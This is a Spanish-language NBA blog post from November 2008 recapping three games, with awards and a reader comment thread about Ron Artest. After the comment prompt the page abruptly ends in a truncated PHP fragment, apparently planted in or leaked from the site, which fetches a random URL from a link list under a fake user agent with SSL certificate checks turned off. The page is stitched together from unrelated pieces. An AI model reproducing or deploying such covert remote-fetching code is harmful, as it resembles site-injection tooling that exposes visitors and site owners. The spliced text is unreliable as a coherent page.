La crónica (04/11/08): La noche del cambio

05 de November de 2008 por MagicJohnson32

Por The DeerHunter

dirkhook

Partidos de máximo interés para el Election Day, para “la noche del cambio”.

Lo más llamativo fue la nueva derrota de los Spurs, en esta ocasión en el AT&T Center frente a unos Mavericks no especialmente brillantes. Este momento va a ser especialmente duro para los pupilos de Popovic, tan acostumbrados a ganar. Anoche ni siquiera Finley carburó y se sitúan con un 0-3 que no lo recuerdan ni los más viejos del lugar. Al menos recuperarán a Oberto, porque Bonner como pívot es una pesadilla. Por Dallas, Nowitzki se redimió de su último descalabro y junto a Terry acribillaron a sus rivales. Kidd y Howard cumplieron y Dampier se lanzó un tiro y lo metió (porque era un mate, claro) superando a Bonner al 100%. Del banquillo, mejor no hablaremos hoy.

En Houston, los Celtics se pusieron las pilas y lograron una trabajada y significativa victoria. Las claves, la amargada de noche a la que inflingieron a Yao, que soñará con los verdes, además del rollo metralleta que trató de llevar Artest (3/16, nada menos) y la actuación exquisita de Ray Allen. T-Mac y Scola se dejaron la piel para remontar, pero no alcanzaron.

Por último, los Suns se comieron con patatas a los Nets. 6/6 hizo Raya Bell en triples, contribuyendo a unos porcentajes colectivos de tiro escandalosos (63,2% en tiros de campo y 66,7% en triples). A Shaq le está viniendo muy bien este ritmo de juego y Nash no se resiente especialmente. Creciendo.

frankdevinvince

Por MagicJohnson32

Éstas son algunas reflexiones extraídas a partir de los últimos resultados y noticias en la NBA:

– Si se hace realidad el supuesto plan de Dumars para hacerse con LeBron James, que le pongan su nombre al premio del mejor GM.

– Los Spurs están 0-3. Lo cierto es que su calendario inicial no era sencillo (Suns, Blazers y Mavs) pero no esperábamos algo así. Ya puede Ginóbili darse prisa en recuperarse, y ya puede Michael Finley dejar de dar tanta pena sobre el parquet.

– Artest acumula 6 de 28 en tiros en los últimos dos partidos. Y en los 4 partidos disputados hasta ahora, es el jugador de los Rockets que en más ocasiones ha lanzado. Que en los Pacers pretendiese ser la estrella tenía cierto pase; que en Sacramento pretendiese ser la estrella tenía hasta lógica; pero que llegue a los Rockets y pretenda ser la estrella…

– ¿Recuerdan cuando los Nets era un equipo triste, aburrido, gris, que penaba por las pistas de la NBA? No hace falta que lo recuerden: basta con ver un partido de los actuales Nets.

Vídeo resumen de los tres partidos disputados anoche:

Éstos son nuestros galardones para las actuaciones más destacadas de la pasada noche:

rayrocketsMVP: Ray Allen desplegó una actuación impecable, con 11 de 15 en tiros de campo (incluyendo 9 de 9 en lanzamientos de 2 puntos), 5 rebotes y 5 asistencias. A una altura similar rayaron Nowitzki & Terry, que en San Antonio se combinaron para sumar 59 puntos con 26 de 45 en tiros, además de 10 rebotes y 9 asistencias.

El rookie: Lo más destacado en cuanto a los rookies fue el primer enfrentamiento como profesionales de los hermanos López, aunque tanto Brook como Robin tuvieron actuaciones muy discretas. El premio de esta pobre jornada para los novatos va para el de los Spurs, George Hill, quien logró 11 puntos en sus primeros 15 minutos de juego en la NBA.

La sorpresa: Los 22 puntos con 7 de 9 en tiros, incluyendo un 6 de 6 en triples, de Raja Bell constituyen una de las principales sorpresas de la noche, aunque queda eclipsado ante el baño que le dio Perkins a Yao. El pívot de los Celtics anotó 15 puntos con 7 de 8 en tiros, atrapó 7 rebotes y colocó 4 tapones.

La decepción: Efectivamente, Yao decepcionó profundamente ante Boston. Falló 10 de sus 14 tiros, se quedó en 8 puntos y 7 rebotes, no taponó ningún lanzamiento y en cambio recibió 3 tapones. El jugador chino lo ha definido bien: “Probablemente uno de mis peores partidos de siempre”.

El mayor esfuerzo en vano: Duncan & Parker llevan camino de convertirse en fijos en esta sección, pero esta vez destacaremos a McGrady (26 puntos, 6 asistencias) y Scola (21 puntos, 9 rebotes), que no fueron suficiente para comensar las malas actuaciones de Yao y Artest.

Y las 10 mejores jugadas de la noche fueron éstas:

Comenta

6 comentarios a esta entrada

  1. Escasez de noticias « Lakers&Gasol dice:
    #1
  2. Viva_Dirk dice:
    #2

    Lo de Artest ya lo avise en el análisis de los Rockets, es un destrozaequipos profesional.

    Y hasta la fecha decepcionante Devin Harris.

      Citar

  3. telekoman dice:
    #3

    Hombre, un partido perdido de 3, tampoco me parece tan destrozaequipos. Pero entiendo que puede llegar a ser una nota discordante en la armonía tejana. Yo espero (modo TJ = ON) que Artest lo haga bien y deje el modo metralleta por el bien de Houston (y de Luisville Telekillos) (modo TJ = OFF)

      Citar

  4. llukas70 dice:
    #4

    Pero que os pasa a todos con Artest , joder!! No soy un gran fan de Artest, es mas nunca me a gustado por que es un notas que solo quiere llamar la atencion, aunque es muy buen jugador. Pero es que solo llevamos 3 partidos y ya estais criticando. Tened paciencia ostia! que por que los Rockets an perdido contra Boston ya teneis que criticar a alguien, claro a McGrady no se le puede criticar y a Yao mucho menos, pues claro queda Artest.

      Citar

  5. Viva_Dirk dice:
    #5

    Llevamos 3 partidos y criticamos o alabamos segun pasa en cada partido, mas adelante vienen las críticas globales pero si no comentamos lo que pasa en cada partido no habría nada que contar.

    A parte, yo lo digo porque en mi predicción para la temporada di a Houston fuera de play-offs, y la mayor razón es el fichaje de Artest.

      Citar

  6. TheDeerHunter dice:
    #6

    Tranquilo LLukas70, hombre…
    Está bien que defiendas a Artest, o a Houston o lo que sea que tú defiendas… pero lo que se ha criticado aquí es un tema en concreto que, en estos pocos partidos ya se ha puesto de manifiesto.

    Estarás de acuerdo conmigo en que más allá de su pésima actuación contra Boston, como la pudo tener también Yao no parece razonable que Artest, en esos 3 partidos que mencionas (en realidad 4) pretenda erigirse contra viento y marea (lo de anoche por ejemplo) como la primera opción ofensiva de Houston, cuando hay otros jugadores con mucho mayor talento ofensivo que él y mucha más jerarquía dentro del equipo. ¿no crees que esa es una actitud que puede desembocar en problemas en el vestuario??

    Y una cosa más, Yao y T-Mac no son precísamente las niñas bonitas de los que por aquí hablamos. Se les critica con normalidad, entiendo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>